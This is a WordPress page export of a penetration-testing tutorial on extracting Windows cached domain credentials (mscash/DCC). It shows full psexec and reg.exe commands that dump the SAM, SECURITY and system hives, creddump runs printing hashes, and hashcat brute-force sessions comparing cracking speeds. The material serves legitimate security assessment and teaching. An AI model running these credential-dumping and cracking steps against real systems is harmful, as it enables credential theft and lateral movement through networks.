{"id":751,"date":"2014-01-22T21:40:39","date_gmt":"2014-01-23T03:40:39","guid":{"rendered":"http:\/\/www.jedge.com\/wordpress\/?page_id=751"},"modified":"2017-11-01T21:01:28","modified_gmt":"2017-11-02T03:01:28","slug":"windows-password-cache-mscache-mscash-v2","status":"publish","type":"page","link":"https:\/\/www.jedge.com\/wordpress\/windows-password-cache-mscache-mscash-v2\/","title":{"rendered":"Windows Password Cache (mscache \/ mscash) v2"},"content":{"rendered":"

10\/31\/2017 Update: Look, I wrote this article two years ago and I see people still visit it. I’ve made some updates and while these commands and tools are all still valid they do not hold a candle to the power of crackmapexec (CME) found at https:\/\/github.com\/byt3bl33d3r\/CrackMapExec<\/a>.<\/p>\n

I wrote an article <\/a>years ago on Windows Password Cache and this page continues to pop up in Google search results. People are still looking for information about the Windows Password Cache. Also known as mscash or mscache. \u00a0The real name is Domain Cached Credentials<\/a> (DCC). \u00a0Well my previous article referenced PWDumpX v1.4 and I would like to move people away from using that tool during an assessment or penetration test. When I get Domain Administrator I may run PWDumpX just to identify for reporting purposes the systems that do not have Antivirus installed or functioning properly. You know because PWDumpX will actually return results. But that is the extent of the use of PWDumpX. When it flags the enterprise antivirus and they call me up saying they spotted me I tell them nicely that I’ve been Domain Admin all week and by the way\u2026your file server has no antivirus.
\n
\nAlso years ago I wrote an article <\/a>on the Windows ntbackup utility. You backup the systemstate which will create a backup of the Windows registry and place the files in C:\\Windows\\repair. You copy the SAM, SECURITY, and system files to your own machine and use the Creddump Python scripts to produce the same results as PWDumpX (except for the PWHistory file).<\/p>\n

What I\u2019m writing up is nothing new and is covered in numerous places specifically the sites listed at the end of this document. However, I\u2019m putting this out there because it can be tough using Google to find exactly what you are asking for when it comes to Windows 7\/8 and Server 2008\/2012. This tutorial will use zero \u201chacker\u201d tools on a target host. As with previous tutorials you will need local administrative privileges on the host. This tutorial is for pivoting within an environment by obtaining Domain credentials\u2026hopefully Domain Admin.<\/p>\n

There are plenty of tools and techniques that do not even require you to crack a password hash but they will not be discussed here. When conducting a penetration test there is nothing better than showing the C Level their password and what data you were able to exfiltrate using his or her credentials. Especially if the password hasn’t changed in ten years and it is the word \u201cmike\u201d. You know\u2026a nickname for his first name.<\/p>\n

Enough chit chat\u2026Let\u2019s do this!<\/p>\n

Windows 2003 Server<\/strong><\/p>\n

Log into the server psexec and the local Administrator account. Obtaining the local Administrator account credentials are outside the scope of this tutorial. Use the reg.exe command to save the SAM, SECURITY, and system hive keys.<\/p>\n

C:\\tools\\PSTools>psexec \\\\192.168.1.103 -u administrator -p password cmd.exe\n\nPsExec v1.98 - Execute processes remotely\nCopyright (C) 2001-2010 Mark Russinovich\nSysinternals - www.sysinternals.com\n\nMicrosoft Windows [Version 5.2.3790]\n(C) Copyright 1985-2003 Microsoft Corp.\n\nC:\\WINDOWS\\system32>reg.exe save HKLM\\SAM ..\/repair\/SAM.192.168.1.103\nThe operation completed successfully.\n\nC:\\WINDOWS\\system32>reg.exe save HKLM\\SECURITY ..\/repair\/SECURITY.192.168.1.103\nThe operation completed successfully.\n\nC:\\WINDOWS\\system32>reg.exe save HKLM\\system ..\/repair\/system.192.168.1.103\nThe operation completed successfully.<\/code><\/pre><\/p>\n
Copy the files from the remote host to your local machine with Python installed.<\/p>\n
Z:\\>copy \\\\192.168.1.103\\c$\\Windows\\repair\\SAM.192.168.1.103 z:\\SAM.192.168.1.103\n1 file(s) copied.\n\nZ:\\>copy \\\\192.168.1.103\\c$\\Windows\\repair\\SECURITY.192.168.1.103 z:\\SECURITY.192.168.1.103\n1 file(s) copied.\n\nZ:\\>copy \\\\192.168.1.103\\c$\\Windows\\repair\\system.192.168.1.103 z:\\system.192.168.1.103\n1 file(s) copied.<\/code><\/pre><\/p>\n
Now that we have the registry files we will use Creddump <\/a>to extract the local user hashes and cached Domain User hashes. By default Windows 2003 Server saves the last 10 Domain users to interactively authenticate to the host. This can be through the console, Remote Desktop Protocol (RDP), or using the RunAs command. Hashes will not be cashed if you authenticate to the host through SMB.<\/p>\n
root@xVidia:~\/tools\/creddump-0.3# python pwdump.py ~\/cacheTest\/Win2003\/system.192.168.1.103 ~\/cacheTest\/Win2003\/SAM.192.168.1.103\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bbcef4ffcfe931235927d4134505691b:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nedge:1001:aad3b435b51404eeaad3b435b51404ee:85055a227564439e1f1b75db8a01e135:::\njames:1003:aad3b435b51404eeaad3b435b51404ee:e547aa58e70cf7e18baf88ee52601296:::<\/code><\/pre><\/p>\n
This tutorial will demonstrate using oclHashcat to crack the mscash v1 hash (Windows 2000\/XP\/2003).<\/p>\n
root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 1100 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m1100_a3.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit => s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: f36bc05594a9a108083d7bcd44e731e3:mscache_test1\nHash.Type......: DCC, mscash\nTime.Started...: Wed Jan 22 13:47:37 2014 (8 secs)\nTime.Estimated.: Tue Jan 28 08:59:42 2014 (5 days, 19 hours)\nSpeed.GPU.#1...: 448.5 MH\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 3694657536\/218340105584896 (0.00%)\nRejected.......: 0\/3694657536 (0.00%)\nHWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit =><\/code><\/pre><\/p>\n
My graphics card, a Nvidia GeForce GTX 650 Ti, can brute force one hash at 448 million a second. An eight (8) character password of upper, lower, and digits can be cracked in under 6 days. That is every combination. I point this out because we will now see how long it takes with mscash v2.<\/p>\n
Windows 2008 Server<\/strong><\/p>\n
C:\\tools\\PSTools>psexec \\\\192.168.1.88 -u Administrator -p password cmd.exe\n\nPsExec v1.98 - Execute processes remotely\nCopyright (C) 2001-2010 Mark Russinovich\nSysinternals - www.sysinternals.com\nMicrosoft Windows [Version 6.1.7601]\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\n\nC:\\Windows\\system32>whoami\nwin-arn6ersoj2m\\administrator\n\nC:\\Windows\\system32>reg.exe save HKLM\\SAM.192.168.1.88 SAM.192.168.1.88\nThe operation completed successfully.\n\nC:\\Windows\\system32>reg.exe save HKLM\\SECURITY.192.168.1.88 SECURITY.192.168.1.88\nThe operation completed successfully.\n\nC:\\Windows\\system32>reg.exe save HKLM\\system.192.168.1.88 system.192.168.1.88\nThe operation completed successfully.<\/code><\/pre><\/p>\n
Again copy them over to your local host and use Creddump to obtain the hashes. However, this time you have to use a patched version of Creddump that supports Windows Vista\/7\/2008<\/p>\n
I\u2019ve seen the updated code posted in forum posts but I’ve decided to host it on this site.<\/p>\n
http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz<\/a><\/p>\n
Z:\\>copy \\\\192.168.1.88\\c$\\Windows\\System32\\SAM.192.168.1.88 z:\\SAM.192.168.1.88\n1 file(s) copied.\n\nZ:\\>copy \\\\192.168.1.88\\c$\\Windows\\System32\\SECURITY.192.168.1.88 z:\\SECURITY.192.168.1.88\n1 file(s) copied.\n\nZ:\\>copy \\\\192.168.1.88\\c$\\Windows\\System32\\system.192.168.1.88 z:\\system.192.168.1.88\n1 file(s) copied.\n\nroot@xVidia:~# wget http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz\n--2014-01-22 13:30:16-- http:\/\/www.jedge.com\/utilities\/windows7.creddump.tar.gz\nResolving www.jedge.com (www.jedge.com)... 74.220.207.132\nConnecting to www.jedge.com (www.jedge.com)|74.220.207.132|:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 39562 (39K) [application\/x-gzip]\nSaving to: \u2018windows7.creddump.tar.gz\u2019\n\n100%[=======================================>] 39,562 224KB\/s in 0.2s\n\n2014-01-22 13:30:17 (224 KB\/s) - \u2018windows7.creddump.tar.gz\u2019 saved [39562\/39562]\n\nroot@xVidia:~# tar zxf windows7.creddump.tar.gz\nroot@xVidia:~# cd creddump\/\nroot@xVidia:~\/creddump# python cachedump.py\nusage: cachedump.py <system hive> <security hive> <vista>\nroot@xVidia:~\/creddump# python cachedump.py ~\/cacheTest\/Win2008\/system ~\/cacheTest\/Win2008\/SECURITY vista\n\nstrongpassword:62c0a5bb83721869f0104a51f34ceb03:jedge:jedge.lcl\nweakpassword:517e61714cbdcfd396f4b3b2b077c921:jedge:jedge.lcl\nmscache_test2:c9736046ca3f3318e7847fb4dae91aa8:jedge:jedge.lcl\njedge:2838f8db1d1eb37651d9d695a3e41c42:jedge:jedge.lcl<\/code><\/pre><\/p>\n
Now here is the part that sucks. Microsoft wised up with mscash. The hash is computed as the previous version but with an extra step added to make it computationally intense to hinder brute force attacks. From http:\/\/openwall.info\/wiki\/john\/MSCash2<\/a><\/p>\n
Apply PBKDF2 <\/a>with SHA1 as HMAC, an iteration count of 10240, the old DCC hash as password and the Unicode username as salt in order to generate the DCC2 (MSCash2) hash. Only the first 128 bits of the resulting 160 bits are used.<\/p>\n
Well how much of a computational hindrance is this new step? See below\u2026<\/p>\n
root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 2100 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m2100.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit => s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: c9736046ca3f3318e7847fb4dae91aa8:mscache_test2\nHash.Type......: DCC2, mscash2\nTime.Started...: Wed Jan 22 13:50:34 2014 (12 secs)\nTime.Estimated.: > 10 Years\nSpeed.GPU.#1...: 10872 H\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 131072\/218340105584896 (0.00%)\nRejected.......: 0\/131072 (0.00%)\nHWMon.GPU.#1...: -1% Util, 35c Temp, 40% Fan<\/code><\/pre><\/p>\n
For mscash v1 you can do 448 million guesses a second while mscash v2 can only do 10,800 a second on the same hardware. An eight (8) character password of upper, lower, and digits takes less than six (6) days for mscash v1 and over ten (10) years for mscash v2<\/p>\n
So what about the local hashes? They are stored using NTLMv2 and nothing has changed in Windows 7\/2008. That is a problem because while the LanManager (LM) hash is in the rear-view mirror back in Windows XP\/2003 land, which we know no longer exists in any environment, the NTLMv2 hash is still a piece of crap (technical term).<\/p>\n
root@xVidia:~\/tools\/oclHashcat-1.01# .\/cudaHashcat64.bin -a 3 -m 1000 ntlmv2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1\ncudaHashcat v1.01 starting...\n\nHashes: 1 total, 1 unique salts, 1 unique digests\nBitmaps: 8 bits, 256 entries, 0x000000ff mask, 1024 bytes\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 80c\nDevice #1: GeForce GTX 650 Ti, 2047MB, 1032Mhz, 4MCU\nDevice #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702\nDevice #1: Kernel .\/kernels\/4318\/m1000_a3.sm_30.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/markov_le_v1.64.ptx\nDevice #1: Kernel .\/kernels\/4318\/bzero.64.ptx\n\n[s]tatus [p]ause [r]esume [b]ypass [q]uit => s\nSession.Name...: cudaHashcat\nStatus.........: Running\nInput.Mode.....: Mask (?1?1?1?1?1?1?1?1) [8]\nHash.Target....: bbcef4ffcfe931235927d4134505691b\nHash.Type......: NTLM\nTime.Started...: Wed Jan 22 14:12:01 2014 (5 secs)\nTime.Estimated.: Fri Jan 24 05:47:11 2014 (1 day, 15 hours)\nSpeed.GPU.#1...: 1604.3 MH\/s\nRecovered......: 0\/1 (0.00%) Digests, 0\/1 (0.00%) Salts\nProgress.......: 8464105472\/218340105584896 (0.00%)\nRejected.......: 0\/8464105472 (0.00%)\nHWMon.GPU.#1...: -1% Util, 31c Temp, 40% Fan<\/code><\/pre><\/p>\n
1.6 billion, with a B, guesses a second. You know password reuse never happens in any environment. Just like Windows XP\/2003 is extinct. If you happen to compromise a target via a vulnerability\u2026say Apache Tomcat is installed on a Windows 2008 server with default credentials, and runs as SYSTEM by default. Well\u2026obtaining the local Administrator NTLMv2 password hash is something that would be quite useful in cracking and very possible with a cheap graphics card.<\/p>\n
Or you could send it to cloudcracker.com<\/a> and for a couple bucks you can run Trillions, yes\u2026with a freakin \u201cT\u201d of password guesses against the hash in a hour.
\nUpdate 10\/31\/2017 - site no longer available.<\/kbd><\/p>\n
Update: 10\/31\/2017 – I have a newer but still inexpensive Nvidia graphics card (GeForce GTX 970) and wanted to update this article on statistics using the latest version of Hashcat (4.0.0). To update to the latest Nvidia drivers see this tutorial http:\/\/www.jedge.com\/wordpress\/2017\/11\/purge-and-install-latest-nvidia-drivers-ubuntu\/<\/a><\/p>\n
Running hashcat against Windows mscash\/mscache\/dcc\/domain cached credentials is a bit faster than my older card.  Almost 10x faster and even faster then cracking NTLMv1 on the older card! <\/p>\n
# .\/hashcat -m1100 -a3 mscash1.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1 -O -w 3\nhashcat (v4.0.0) starting...\n\nOpenCL Platform #1: NVIDIA Corporation\n======================================\n* Device #1: GeForce GTX 970, 1008\/4033 MB allocatable, 13MCU\n\nHashes: 2 digests; 2 unique digests, 2 unique salts\nBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates\n\nApplicable optimizers:\n* Optimized-Kernel\n* Zero-Byte\n* Precompute-Init\n* Precompute-Merkle-Demgard\n* Early-Skip\n* Not-Iterated\n* Brute-Force\n\nPassword length minimum: 0\nPassword length maximum: 27\n\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 75c\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s\n\nSession..........: hashcat\nStatus...........: Running\nHash.Type........: Domain Cached Credentials (DCC), MS Cache\nHash.Target......: mscash1.example.txt\nTime.Started.....: Wed Nov  1 20:48:30 2017 (14 secs)\nTime.Estimated...: Fri Nov  3 00:09:27 2017 (1 day, 3 hours)\nGuess.Mask.......: ?1?1?1?1?1?1?1?1 [8]\nGuess.Charset....: -1 ?u?l?d, -2 Undefined, -3 Undefined, -4 Undefined\nGuess.Queue......: 1\/1 (100.00%)\nSpeed.Dev.#1.....:  4435.2 MH\/s (91.13ms)\nRecovered........: 0\/2 (0.00%) Digests, 0\/2 (0.00%) Salts\nProgress.........: 60257992704\/436680211169792 (0.01%)\nRejected.........: 0\/60257992704 (0.00%)\nRestore.Point....: 7667712\/56800235584 (0.01%)\nCandidates.#1....: SnHiAW00 -> XzwXxX00\nHWMon.Dev.#1.....: Temp: 65c Fan: 33% Util:100% Core:1316MHz Mem:3004MHz Bus:16\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>\n<\/code><\/pre><\/p>\n
With a newer graphics card is there any real chance of cracking an mscash v2\/mscache v2\/dcc2 password?  No…at least hashcat can now accuratly tell you it will take 190 years to iterate through all combinations at 145,100 guesses a second (13x faster than the older GeForce GTX 650 Ti) .  Now you can run a dictionary attack and may get lucky. <\/p>\n
# .\/hashcat -m2100 -a3 mscash2.example.txt -1?u?l?d ?1?1?1?1?1?1?1?1 -O -w 3\nhashcat (v4.0.0) starting...\n\nOpenCL Platform #1: NVIDIA Corporation\n======================================\n* Device #1: GeForce GTX 970, 1008\/4033 MB allocatable, 13MCU\n\nHashes: 4 digests; 4 unique digests, 4 unique salts\nBitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5\/13 rotates\n\nApplicable optimizers:\n* Zero-Byte\n* Brute-Force\n* Slow-Hash-SIMD-LOOP\n\nPassword length minimum: 0\nPassword length maximum: 256\n\nWatchdog: Temperature abort trigger set to 90c\nWatchdog: Temperature retain trigger set to 75c\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s\n\nSession..........: hashcat\nStatus...........: Running\nHash.Type........: Domain Cached Credentials 2 (DCC2), MS Cache 2\nHash.Target......: mscash2.example.txt\nTime.Started.....: Wed Nov  1 21:47:45 2017 (4 secs)\nTime.Estimated...: Sun Jul 10 04:33:15 2208 (190 years, 250 days)\nGuess.Mask.......: ?1?1?1?1?1?1?1?1 [8]\nGuess.Charset....: -1 ?u?l?d, -2 Undefined, -3 Undefined, -4 Undefined\nGuess.Queue......: 1\/1 (100.00%)\nSpeed.Dev.#1.....:   145.1 kH\/s (72.97ms)\nRecovered........: 0\/4 (0.00%) Digests, 0\/4 (0.00%) Salts\nProgress.........: 425984\/873360422339584 (0.00%)\nRejected.........: 0\/425984 (0.00%)\nRestore.Point....: 0\/3521614606208 (0.00%)\nCandidates.#1....: 1arierin -> 1yyZY123\nHWMon.Dev.#1.....: Temp: 62c Fan: 33% Util:100% Core:1316MHz Mem:3004MHz Bus:16\n\n[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =><\/code><\/pre><\/p>\n
Helpful Links because I didn’t come up with any of this myself.<\/p>\n
http:\/\/openwall.info\/wiki\/john\/MSCash<\/a><\/p>\n
http:\/\/openwall.info\/wiki\/john\/MSCash2<\/a><\/p>\n
\u00a0http:\/\/bernardodamele.blogspot.com\/2011\/12\/dump-windows-password-hashes.html<\/a><\/p>\n
http:\/\/computer-forensics.sans.org\/blog\/2012\/02\/21\/protecting-privileged-domain-account-safeguarding-password-hashes<\/a><\/p>\n
http:\/\/technet.microsoft.com\/en-us\/library\/cc732643.aspx<\/a><\/p>\n
https:\/\/code.google.com\/p\/creddump\/<\/a><\/p>\n
http:\/\/support.microsoft.com\/kb\/913485<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
10\/31\/2017 Update: Look, I wrote this article two years ago and I see people still visit it. I’ve made some updates and while these commands and tools are all still valid they do not hold a candle to the power of crackmapexec (CME) found at https:\/\/github.com\/byt3bl33d3r\/CrackMapExec. I wrote an article years ago on Windows Password […]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"class_list":["post-751","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/comments?post=751"}],"version-history":[{"count":9,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751\/revisions"}],"predecessor-version":[{"id":1060,"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/pages\/751\/revisions\/1060"}],"wp:attachment":[{"href":"https:\/\/www.jedge.com\/wordpress\/wp-json\/wp\/v2\/media?parent=751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}